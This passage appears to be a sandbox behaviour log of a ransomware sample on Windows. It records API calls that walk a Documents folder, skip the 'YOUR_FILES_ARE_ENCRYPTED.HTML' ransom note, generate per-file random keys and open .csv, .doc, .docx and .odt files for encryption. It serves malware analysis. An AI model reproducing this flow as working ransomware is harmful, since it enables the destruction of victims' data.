lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a" [0124.072] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\*" [0124.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x449498c0, ftCreationTime.dwHighDateTime=0x1d700c7, ftLastAccessTime.dwLowDateTime=0x15d88210, ftLastAccessTime.dwHighDateTime=0x1d70542, ftLastWriteTime.dwLowDateTime=0x15d88210, ftLastWriteTime.dwHighDateTime=0x1d70542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4618, dwReserved1=0x62ec98, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0124.072] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x449498c0, ftCreationTime.dwHighDateTime=0x1d700c7, ftLastAccessTime.dwLowDateTime=0x15d88210, ftLastAccessTime.dwHighDateTime=0x1d70542, ftLastWriteTime.dwLowDateTime=0x15d88210, ftLastWriteTime.dwHighDateTime=0x1d70542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4618, dwReserved1=0x62ec98, cFileName="..", cAlternateFileName="")) returned 1 [0124.072] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdc252a0, ftCreationTime.dwHighDateTime=0x1d70625, ftLastAccessTime.dwLowDateTime=0xb6686550, ftLastAccessTime.dwHighDateTime=0x1d707e1, ftLastWriteTime.dwLowDateTime=0xb6686550, ftLastWriteTime.dwHighDateTime=0x1d707e1, nFileSizeHigh=0x0, nFileSizeLow=0xc331, dwReserved0=0x6f4618, dwReserved1=0x62ec98, cFileName="A4rlSjgAia3c.csv", cAlternateFileName="A4RLSJ~1.CSV")) returned 1 [0124.072] StrStrIW (lpFirst="A4rlSjgAia3c.csv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.072] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\A4rlSjgAia3c.csv") returned 88 [0124.072] PathFindExtensionW (pszPath="A4rlSjgAia3c.csv") returned=".csv" [0124.072] lstrlenW (lpString=".csv") returned 4 [0124.072] PathFindExtensionW (pszPath="A4rlSjgAia3c.csv") returned=".csv" [0124.072] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\A4rlSjgAia3c.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\4v07jmxo0a\\a4rlsjgaia3c.csv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.073] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=49969) returned 1 [0124.074] GetProcessHeap () returned 0x600000 [0124.074] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.076] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="EE") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="09") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="2A") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="FA") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="B2") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="98") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="9A") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="8D") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="5D") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="81") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="F9") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="45") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="D6") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="3A") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="51") returned 2 [0124.076] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="AE") returned 2 [0124.077] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="91") returned 2 [0124.077] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="B7") returned 2 [0124.077] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="2C") returned 2 [0124.077] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="9D") returned 2 [0124.077] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="F1") returned 2 [0124.077] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="0D") returned 2 [0124.077] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="7D") returned 2 [0124.077] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="85") returned 2 [0124.077] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="0E") returned 2 [0124.077] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="CA") returned 2 [0124.077] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="C3") returned 2 [0124.077] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="2C") returned 2 [0124.077] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="5E") returned 2 [0124.077] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="88") returned 2 [0124.077] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="7F") returned 2 [0124.077] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="7C") returned 2 [0124.077] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\A4rlSjgAia3c.csv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\A4rlSjgAia3c.csv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\A4rlSjgAia3c.csv" [0124.077] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.077] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.078] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b31c300, ftCreationTime.dwHighDateTime=0x1d6fdf1, ftLastAccessTime.dwLowDateTime=0xbe738250, ftLastAccessTime.dwHighDateTime=0x1d6ff3c, ftLastWriteTime.dwLowDateTime=0xbe738250, ftLastWriteTime.dwHighDateTime=0x1d6ff3c, nFileSizeHigh=0x0, nFileSizeLow=0x4a36, dwReserved0=0x6f4618, dwReserved1=0x62ec98, cFileName="mlxdYvvdE5S6wZOP0yPo.doc", cAlternateFileName="MLXDYV~1.DOC")) returned 1 [0124.078] StrStrIW (lpFirst="mlxdYvvdE5S6wZOP0yPo.doc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.078] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\mlxdYvvdE5S6wZOP0yPo.doc") returned 96 [0124.078] PathFindExtensionW (pszPath="mlxdYvvdE5S6wZOP0yPo.doc") returned=".doc" [0124.078] lstrlenW (lpString=".doc") returned 4 [0124.078] PathFindExtensionW (pszPath="mlxdYvvdE5S6wZOP0yPo.doc") returned=".doc" [0124.078] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\mlxdYvvdE5S6wZOP0yPo.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\4v07jmxo0a\\mlxdyvvde5s6wzop0ypo.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0124.079] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=18998) returned 1 [0124.079] GetProcessHeap () returned 0x600000 [0124.079] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.082] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="B7") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="19") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="DE") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="5E") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="8C") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="48") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="AD") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="62") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="27") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="68") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="2B") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="72") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="50") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="82") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="2D") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="67") returned 2 [0124.082] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="52") returned 2 [0124.082] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="12") returned 2 [0124.083] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="A5") returned 2 [0124.083] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="6D") returned 2 [0124.083] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="CB") returned 2 [0124.083] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="C8") returned 2 [0124.083] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="1D") returned 2 [0124.083] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="84") returned 2 [0124.083] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="55") returned 2 [0124.083] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="3C") returned 2 [0124.083] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="A8") returned 2 [0124.083] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="35") returned 2 [0124.083] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="9A") returned 2 [0124.083] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="E2") returned 2 [0124.083] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="A3") returned 2 [0124.083] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="1F") returned 2 [0124.083] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\mlxdYvvdE5S6wZOP0yPo.doc" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\mlxdYvvdE5S6wZOP0yPo.doc") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\mlxdYvvdE5S6wZOP0yPo.doc" [0124.083] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.083] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.088] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2bdaca0, ftCreationTime.dwHighDateTime=0x1d70301, ftLastAccessTime.dwLowDateTime=0x3c6ee6b0, ftLastAccessTime.dwHighDateTime=0x1d704bd, ftLastWriteTime.dwLowDateTime=0x3c6ee6b0, ftLastWriteTime.dwHighDateTime=0x1d704bd, nFileSizeHigh=0x0, nFileSizeLow=0x16c19, dwReserved0=0x6f4618, dwReserved1=0x62ec98, cFileName="RovjXe.docx", cAlternateFileName="ROVJXE~1.DOC")) returned 1 [0124.088] StrStrIW (lpFirst="RovjXe.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.088] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\RovjXe.docx") returned 83 [0124.089] PathFindExtensionW (pszPath="RovjXe.docx") returned=".docx" [0124.089] lstrlenW (lpString=".docx") returned 5 [0124.089] PathFindExtensionW (pszPath="RovjXe.docx") returned=".docx" [0124.089] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\RovjXe.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\4v07jmxo0a\\rovjxe.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0124.090] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=93209) returned 1 [0124.090] GetProcessHeap () returned 0x600000 [0124.090] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.091] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="CB") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="4B") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="47") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="62") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="06") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="AC") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="66") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="58") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="FD") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="AD") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="C9") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="C1") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="61") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="C3") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="54") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="D2") returned 2 [0124.091] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="83") returned 2 [0124.091] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="72") returned 2 [0124.091] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="B5") returned 2 [0124.091] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="81") returned 2 [0124.091] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="5C") returned 2 [0124.091] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="A1") returned 2 [0124.091] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="6C") returned 2 [0124.091] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="67") returned 2 [0124.091] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="8C") returned 2 [0124.091] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="91") returned 2 [0124.091] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="7B") returned 2 [0124.091] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="CB") returned 2 [0124.091] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="4C") returned 2 [0124.091] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="76") returned 2 [0124.091] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="FF") returned 2 [0124.091] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="07") returned 2 [0124.092] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\RovjXe.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\RovjXe.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\RovjXe.docx" [0124.092] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.092] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.096] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3eca3d0, ftCreationTime.dwHighDateTime=0x1d7004f, ftLastAccessTime.dwLowDateTime=0xfd79aa30, ftLastAccessTime.dwHighDateTime=0x1d70313, ftLastWriteTime.dwLowDateTime=0xfd79aa30, ftLastWriteTime.dwHighDateTime=0x1d70313, nFileSizeHigh=0x0, nFileSizeLow=0xbad3, dwReserved0=0x6f4618, dwReserved1=0x62ec98, cFileName="SW2SD8e4x7.odt", cAlternateFileName="SW2SD8~1.ODT")) returned 1 [0124.096] StrStrIW (lpFirst="SW2SD8e4x7.odt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.097] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\SW2SD8e4x7.odt") returned 86 [0124.097] PathFindExtensionW (pszPath="SW2SD8e4x7.odt") returned=".odt" [0124.097] lstrlenW (lpString=".odt") returned 4 [0124.097] PathFindExtensionW (pszPath="SW2SD8e4x7.odt") returned=".odt" [0124.097] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\SW2SD8e4x7.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\4v07jmxo0a\\sw2sd8e4x7.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0124.098] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=47827) returned 1 [0124.098] GetProcessHeap () returned 0x600000 [0124.098] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.099] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="34") returned 2 [0124.099] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="B5") returned 2 [0124.099] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="6B") returned 2 [0124.099] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="E3") returned 2 [0124.099] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="27") returned 2 [0124.099] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="DA") returned 2 [0124.099] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="97") returned 2 [0124.099] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="CF") returned 2 [0124.099] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="B5") returned 2 [0124.100] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="C2") returned 2 [0124.100] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="1B") returned 2 [0124.100] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="98") returned 2 [0124.100] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="F4") returned 2 [0124.100] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="94") returned 2 [0124.100] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="DB") returned 2 [0124.100] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="70") returned 2 [0124.100] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="58") returned 2 [0124.100] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="1E") returned 2 [0124.100] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="B8") returned 2 [0124.100] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="2C") returned 2 [0124.100] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="62") returned 2 [0124.100] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="1D") returned 2 [0124.100] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="A4") returned 2 [0124.100] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="2A") returned 2 [0124.100] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="55") returned 2 [0124.100] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="EA") returned 2 [0124.100] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="7D") returned 2 [0124.100] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="85") returned 2 [0124.100] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="FB") returned 2 [0124.100] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="9C") returned 2 [0124.100] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="B3") returned 2 [0124.100] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="61") returned 2 [0124.101] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\SW2SD8e4x7.odt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\SW2SD8e4x7.odt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\SW2SD8e4x7.odt" [0124.101] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.101] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.104] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa47b0500, ftCreationTime.dwHighDateTime=0x1d7041c, ftLastAccessTime.dwLowDateTime=0xbd6ab900, ftLastAccessTime.dwHighDateTime=0x1d70a6d, ftLastWriteTime.dwLowDateTime=0xbd6ab900, ftLastWriteTime.dwHighDateTime=0x1d70a6d, nFileSizeHigh=0x0, nFileSizeLow=0x6680, dwReserved0=0x6f4618, dwReserved1=0x62ec98, cFileName="UsMBTgT.doc", cAlternateFileName="")) returned 1 [0124.104] StrStrIW (lpFirst="UsMBTgT.doc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.104] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\UsMBTgT.doc") returned 83 [0124.104] PathFindExtensionW (pszPath="UsMBTgT.doc") returned=".doc" [0124.104] lstrlenW (lpString=".doc") returned 4 [0124.104] PathFindExtensionW (pszPath="UsMBTgT.doc") returned=".doc" [0124.104] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\UsMBTgT.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\4v07jmxo0a\\usmbtgt.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 